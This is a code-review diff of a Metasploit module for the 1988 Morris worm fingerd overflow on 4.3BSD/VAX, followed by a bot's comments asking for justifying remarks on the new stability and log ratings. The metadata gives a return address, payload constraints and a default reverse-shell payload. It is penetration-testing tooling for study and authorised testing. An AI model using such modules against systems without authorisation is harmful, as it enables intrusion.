@@ -14,49 +14,60 @@ class MetasploitModule < Msf::Exploit::Remote
1414 prepend Msf ::Exploit ::Remote ::AutoCheck
1515
1616 def initialize ( info = { } )
17- super ( update_info ( info ,
18- 'Name' => 'Morris Worm fingerd Stack Buffer Overflow' ,
19- 'Description' => %q{
20- This module exploits a stack buffer overflow in fingerd on 4.3BSD.
21-
22- This vulnerability was exploited by the Morris worm in 1988-11-02.
23- Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
24-
25- Currently, only bsd/vax/shell_reverse_tcp is supported.
26- } ,
27- 'Author' => [
28- 'Robert Tappan Morris' , # Discovery? Exploit and worm for sure
29- 'Cliff Stoll' , # The Cuckoo's Egg epilogue and inspiration
30- 'wvu' # Module, payload, and additional research
31- ] ,
32- 'References' => [
33- [ 'URL' , 'https://en.wikipedia.org/wiki/Morris_worm' ] , # History
34- [ 'URL' , 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf' ] , # Analysis
35- [ 'URL' , 'http://computerarcheology.com/Virus/MorrisWorm/' ] , # Details
36- [ 'URL' , 'https://github.com/arialdomartini/morris-worm' ] , # Source
37- [ 'URL' , 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH' ] # Setup
38- # And credit to the innumerable VAX ISA docs on the Web
39- ] ,
40- 'DisclosureDate' => '1988-11-02' ,
41- 'License' => MSF_LICENSE ,
42- 'Platform' => 'bsd' ,
43- 'Arch' => ARCH_VAX ,
44- 'Privileged' => false , # Depends on inetd.conf, usually "nobody"
45- 'Targets' => [
46- # https://en.wikipedia.org/wiki/Source_Code_Control_System
47- [ '@(#)fingerd.c 5.1 (Berkeley) 6/6/85' ,
48- 'Ret' => 0x7fffe9b0 ,
49- 'Payload' => {
50- 'Space' => 403 ,
51- 'BadChars' => "\n " ,
52- 'Encoder' => 'generic/none' , # There is no spoon
53- 'DisableNops' => true # Hardcoded NOPs
54- }
55- ]
56- ] ,
57- 'DefaultTarget' => 0 ,
58- 'DefaultOptions' => { 'PAYLOAD' => 'bsd/vax/shell_reverse_tcp' }
59- ) )
17+ super (
18+ update_info (
19+ info ,
20+ 'Name' => 'Morris Worm fingerd Stack Buffer Overflow' ,
21+ 'Description' => %q{
22+ This module exploits a stack buffer overflow in fingerd on 4.3BSD.
23+
24+ This vulnerability was exploited by the Morris worm in 1988-11-02.
25+ Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
26+
27+ Currently, only bsd/vax/shell_reverse_tcp is supported.
28+ } ,
29+ 'Author' => [
30+ 'Robert Tappan Morris' , # Discovery? Exploit and worm for sure
31+ 'Cliff Stoll' , # The Cuckoo's Egg epilogue and inspiration
32+ 'wvu' # Module, payload, and additional research
33+ ] ,
34+ 'References' => [
35+ [ 'URL' , 'https://en.wikipedia.org/wiki/Morris_worm' ] , # History
36+ [ 'URL' , 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf' ] , # Analysis
37+ [ 'URL' , 'http://computerarcheology.com/Virus/MorrisWorm/' ] , # Details
38+ [ 'URL' , 'https://github.com/arialdomartini/morris-worm' ] , # Source
39+ [ 'URL' , 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH' ] # Setup
40+ # And credit to the innumerable VAX ISA docs on the Web
41+ ] ,
42+ 'DisclosureDate' => '1988-11-02' ,
43+ 'License' => MSF_LICENSE ,
44+ 'Platform' => 'bsd' ,
45+ 'Arch' => ARCH_VAX ,
46+ 'Privileged' => false , # Depends on inetd.conf, usually "nobody"
47+ 'Targets' => [
48+ # https://en.wikipedia.org/wiki/Source_Code_Control_System
49+ [
50+ '@(#)fingerd.c 5.1 (Berkeley) 6/6/85' ,
51+ {
52+ 'Ret' => 0x7fffe9b0 ,
53+ 'Payload' => {
54+ 'Space' => 403 ,
55+ 'BadChars' => "\n " ,
56+ 'Encoder' => 'generic/none' , # There is no spoon
57+ 'DisableNops' => true # Hardcoded NOPs
58+ }
59+ }
60+ ]
61+ ] ,
62+ 'DefaultTarget' => 0 ,
63+ 'DefaultOptions' => { 'PAYLOAD' => 'bsd/vax/shell_reverse_tcp' } ,
64+ 'Notes' => {
65+ 'Reliability' => [ REPEATABLE_SESSION ] ,
66+ 'Stability' => [ CRASH_SERVICE_RESTARTS ] ,
67+ 'SideEffects' => [ IOC_IN_LOGS ]
68+ }
69+ )
70+ )
6071
6172 register_options ( [ Opt ::RPORT ( 79 ) ] )
6273 end
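Review bot: The new `Notes` hash (new-side lines 64–68) asserts `CRASH_SERVICE_RESTARTS` and `IOC_IN_LOGS` without a comment saying what backs them, while every other judgement call in this metadata (`Privileged`, `Encoder`, `DisableNops`) carries one. If fingerd is spawned per connection by inetd, as the `Privileged` comment implies, a comment such as `# inetd spawns fingerd per connection, so a crash only ends that instance` above `Stability`, and one naming the log where the connection is recorded above `SideEffects`, would let a reader verify the ratings. The description still says only bsd/vax/shell_reverse_tcp is supported, yet nothing beyond `Platform`/`Arch` restricts payload choice; if other VAX payloads would not fit the 403-byte `Space` with the hardcoded NOPs, that constraint belongs in the description rather than only in `DefaultOptions`. The `initialize` method closes inside the hunk; the `check` implied by `AutoCheck` on the first context line is outside it.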